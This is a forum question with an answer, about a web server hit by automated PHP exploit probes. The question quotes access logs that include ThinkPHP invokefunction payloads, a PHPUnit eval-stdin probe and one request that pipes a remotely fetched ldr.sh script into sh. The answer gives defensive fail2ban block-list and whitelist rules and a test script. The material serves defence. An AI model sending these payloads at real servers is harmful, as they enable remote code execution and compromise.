Web server under attack

My web server keeps getting hit with attacks that exploit PHP vulnerabilities and use GET requests. How worried should I be about having been compromised, and how do I check, given that some of the requests return 302 and others return 200? If I have been compromised, what would be the best way to keep my current server configuration and remove the unwanted scripts? The examples I give are from within the last day; they are just a sample to give you an idea of the scale of the problem. How should I respond to this situation? I also have fail2ban installed. I can provide any additional examples/data to help me solve this problem! Thanks in advance!

Some access log entries:

Example 1:

```text
- - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
- - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
```

Example 2:

```text
- - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1"
```

This line is being spammed over 200 times.

Example 3:

```text
- - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041 
```

Answer 1

> I also have fail2ban installed.

Just installing fail2ban is not enough; you have to configure it for your needs. Fail2ban is only a tool and, like many other tools, it needs to be used correctly.

To stop such a "flood", there are basically three main approaches:

1. If you are sure that your web pages have essentially no broken links, it is enough to react to 404 (or other 40x) responses:

```ini
[bad-http]
logpath = /path/to/your/log
filter =
# fail on every 40x (excepting 401 for authentication attempt, which should be handled separately):
failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

And you have to check (and probably correct) the rule that causes the 302 redirects (possibly so that this redirect affects only some whitelist of URIs).

2. If you cannot be sure, or need more precise handling, you have to build a block-list of URIs this bot frequently uses (or check the referrer, some cookie, or anything else), for example:

```ini
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (uris starting with this block-list):
_blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

Note that in this case you have to check that the URI prefixes in the block-list do not conflict with your legitimate URIs, and you have to keep maintaining this list. Note also that it is very easy for the "intruder" to avoid the ban simply by changing the URI (e.g. adding other parameters before your prefix).

3. The same as 2, but with a white-list of valid URIs:

```ini
[bad-http]
logpath = /path/to/your/log
filter =
# fail on certain 40x (excepting given white-list):
_whitelist = my-app|other-app
failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+
maxretry = 10
# findtime = some-time-after-maxretry-attempts-should-cause-a-ban
enabled = true
```

Here you can specify REs for all your valid prefixes in `_whitelist`, to avoid possible false positives on legitimate URIs entirely.

Whichever you use, you can start with a large `maxretry` (and a short `findtime`) and a small `bantime` (this avoids overly long bans resulting from possible false positives), and if your fail2ban version is >= 0.10 and `bantime.increment` is enabled, repeat offenders will later be banned for longer and faster.

Also consider https://github.com/fail2ban/fail2ban/wiki/Best-practice for some advice on how to configure fail2ban jails and filters more effectively.
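As an added example (not part of the question or the answer), the script below applies the answer's three `failregex` variants to constructed access-log lines shaped like the ones in the question and counts failures per client address, roughly the way fail2ban does before comparing against `maxretry`. The timestamp stripping and the IPv4-only stand-in for fail2ban's `<ADDR>` tag are simplifications; the IPs are RFC 5737 placeholders.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the question's log (placeholder IPs).
# 203.0.113.5 plays the scanner; 198.51.100.7 a legitimate user hitting a
# broken link and an HTTP auth challenge.
LOG_LINES = [
    '203.0.113.5 - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2021:16:24:48 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 9450 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Mar/2021:16:30:00 +0000] "GET /my-app/missing.css HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Mar/2021:16:31:00 +0000] "GET /admin/ HTTP/1.1" 401 300 "-" "Mozilla/5.0"',
]

# fail2ban cuts the recognised timestamp out of the line before matching
# failregex, which is why the answer's patterns contain a bare `\[\]`.
DATE_RE = re.compile(r"\[\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4}\]")
# Simplified stand-in for fail2ban's <ADDR> tag (IPv4 only, assumption).
ADDR = r"(?P<addr>\d{1,3}(?:\.\d{1,3}){3})"
BLOCKLIST = r"vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover"
WHITELIST = r"my-app|other-app"

# The three failregex variants from the answer, with %(...)s already expanded.
FILTERS = {
    "any-40x": re.compile(r"^" + ADDR + r' \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+'),
    "blocklist": re.compile(r"^" + ADDR + r' \S+ \S+ \[\] "[A-Z]+ /(?:' + BLOCKLIST + r')\b[^"]*" 40\d\s+'),
    "whitelist": re.compile(r"^" + ADDR + r' \S+ \S+ \[\] "[A-Z]+ /(?!' + WHITELIST + r')\b[^"]*" 40\d\s+'),
}


def failures_per_addr(lines):
    """Return {filter_name: {client_addr: failure_count}} for the given lines."""
    counts = {name: Counter() for name in FILTERS}
    for line in lines:
        msg = DATE_RE.sub("[]", line, count=1)  # what fail2ban's failregex sees
        for name, rx in FILTERS.items():
            m = rx.search(msg)
            if m:
                counts[name][m.group("addr")] += 1
    return {name: dict(c) for name, c in counts.items()}


def would_ban(counts, maxretry):
    """Addresses whose failure count reaches maxretry (findtime ignored here)."""
    return {name: sorted(a for a, n in c.items() if n >= maxretry)
            for name, c in counts.items()}


if __name__ == "__main__":
    counts = failures_per_addr(LOG_LINES)
    for name, per_addr in counts.items():
        print(f"{name:10s} {per_addr}")
    # The /phpmyadmin/ probe (question, example 2) is missed by the blocklist
    # filter; the legitimate 404 counts against the real user under any-40x
    # but not under whitelist, which in turn also counts the 401 challenge.
    print(would_ban(counts, maxretry=3))
```

Run it to see which client each filter would count toward a ban; the numbers illustrate the trade-offs the answer describes between the three approaches.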
